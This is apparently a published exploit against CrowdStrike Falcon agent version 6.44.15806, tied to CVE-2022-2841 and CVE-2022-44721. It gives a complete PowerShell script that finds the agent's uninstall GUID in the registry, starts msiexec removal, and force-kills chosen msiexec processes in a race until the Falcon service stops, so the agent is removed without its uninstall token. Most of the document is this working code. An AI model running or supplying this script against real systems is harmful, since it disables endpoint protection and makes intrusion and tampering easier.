# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token # Date: 30/11/2022 # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) # Vendor Homepage: https://www.crowdstrike.com/ # Author Homepage: https://www.deda.cloud/ # Tested On: All Windows versions # Version: 6.44.15806 # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall" foreach($obj in $InstalledSoftware){ if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName')) { $uninstall_uuid = $obj.Name.Split("\")[6] } } $g_msiexec_instances = New-Object System.Collections.ArrayList Write-Host "[+] Identified installed Falcon: $uninstall_uuid" Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ." Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid" while($true) { if (get-process -Name "CSFalconService") { Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object { if (-Not $g_msiexec_instances.contains($_.id)){ $g_msiexec_instances.Add($_.id) if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){ Start-Sleep -Milliseconds 100 Write-Host "[+] Killing PID " + $g_msiexec_instances[-1] stop-process -Force -Id $g_msiexec_instances[-1] } } } } else { Write-Host "[+] CSFalconService process vanished...reboot and have fun!" break } }